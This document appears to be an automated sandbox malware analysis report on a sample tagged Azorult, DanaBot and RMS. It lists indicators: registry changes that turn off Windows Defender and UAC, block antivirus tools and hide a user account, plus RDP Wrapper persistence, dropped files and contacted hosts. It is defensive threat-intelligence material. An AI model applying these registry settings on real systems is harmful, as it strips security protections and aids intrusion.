Malware Analysis Report

2025-05-28 17:09

Sample ID 250519-meq5taem8v
Target 20250322_162339.webp
SHA256 a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda
Tags
azorult danabot rms banker botnet defense_evasion discovery execution infostealer lateral_movement persistence privilege_escalation rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda

Threat Level: Known bad

The file 20250322_162339.webp was found to be: Known bad.

Malicious Activity Summary

azorult danabot rms banker botnet defense_evasion discovery execution infostealer lateral_movement persistence privilege_escalation rat trojan upx

UAC bypass

Windows security bypass

Azorult family

Danabot

Azorult

Modifies visiblity of hidden/system files in Explorer

Danabot family

RMS

Modifies Windows Defender Real-time Protection settings

Danabot x86 payload

Rms family

Remote Service Session Hijacking: RDP Hijacking

Grants admin privileges

Downloads MZ/PE file

Sets file to hidden

Drops file in Drivers directory

Server Software Component: Terminal Services DLL

Modifies Windows Firewall

Blocklisted process makes network request

Stops running service(s)

Blocks application from running via registry modification

Modifies file permissions

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Password Policy Discovery

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Modifies WinLogon

Looks up external IP address via web service

UPX packed file

Drops file in System32 directory

AutoIT Executable

Hide Artifacts: Hidden Users

Launches sc.exe

Drops file in Program Files directory

Permission Groups Discovery: Local Groups

Program crash

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious behavior: LoadsDriver

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Gathers network information

Delays execution with timeout.exe

Kills process with taskkill

Suspicious behavior: SetClipboardViewer

NTFS ADS

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Runs .reg file with regedit

Opens file in notepad (likely ransom note)

System policy modification

Checks processor information in registry

Runs net.exe

Modifies registry class

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-05-19 10:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-19 10:22

Reported

2025-05-19 10:30

Platform

win10v2004-20250502-en

Max time kernel

413s

Max time network

409s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Danabot

trojan banker danabot

Danabot family

danabot

Danabot x86 payload

botnet
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Downloads\Azorult.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\Downloads\Azorult.exe N/A

Modifies visiblity of hidden/system files in Explorer

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhostw.exe N/A

RMS

trojan rat rms

Rms family

rms

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\SysWOW64\regedit.exe N/A

Windows security bypass

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\regedit.exe N/A

Grants admin privileges

Remote Service Session Hijacking: RDP Hijacking

lateral_movement
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net1.exe N/A

Blocks application from running via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\Users\Admin\Downloads\Azorult.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Downloads\Azorult.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\rdp\RDPWInst.exe N/A

Sets file to hidden

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

defense_evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\winlog.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\winlogon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\programdata\install\cheat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\programdata\microsoft\intel\R8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\Azorult.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\wini.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\DanaBot.exe N/A
N/A N/A C:\Users\Admin\Downloads\DanaBot.exe N/A
N/A N/A C:\Users\Admin\Downloads\DanaBot.exe N/A
N/A N/A C:\Users\Admin\Downloads\DanaBot.exe N/A
N/A N/A C:\Users\Admin\Downloads\SpySheriff.exe N/A
N/A N/A C:\Users\Admin\Downloads\SpySheriff.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A
N/A N/A C:\programdata\install\ink.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
N/A N/A C:\programdata\microsoft\intel\P.exe N/A
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A
N/A N/A C:\Users\Admin\Downloads\Mabezat.exe N/A
N/A N/A C:\Users\Admin\Downloads\Mabezat.exe N/A
N/A N/A C:\programdata\microsoft\intel\R8.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\winlog.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\winlogon.exe N/A
N/A N/A C:\rdp\Rar.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\ProgramData\RealtekHD\taskhostw.exe N/A
N/A N/A C:\rdp\RDPWInst.exe N/A
N/A N/A C:\Programdata\WindowsTask\winlogon.exe N/A
N/A N/A C:\rdp\RDPWInst.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Users\Admin\Downloads\Mabezat.exe N/A
N/A N/A C:\Users\Admin\Downloads\Mabezat.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Programdata\RealtekHD\taskhostw.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Downloads\Azorult.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\rdp\RDPWInst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\Downloads\Azorult.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\Downloads\Azorult.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\Downloads\Azorult.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\Downloads\Azorult.exe N/A

Password Policy Discovery

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\rfxvmt.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\automation.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_etld1_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\smart_switch_list.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\COMODO C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files\Cezurity C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-kayak.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\crl-set C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\keys.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\nav_config.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\ESET C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\ByteFence C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\extraction.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\typosquatting_list.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files (x86)\Zaxar C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\Users\Admin\Downloads\Azorult.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_24898505\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\office_endpoints_list.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
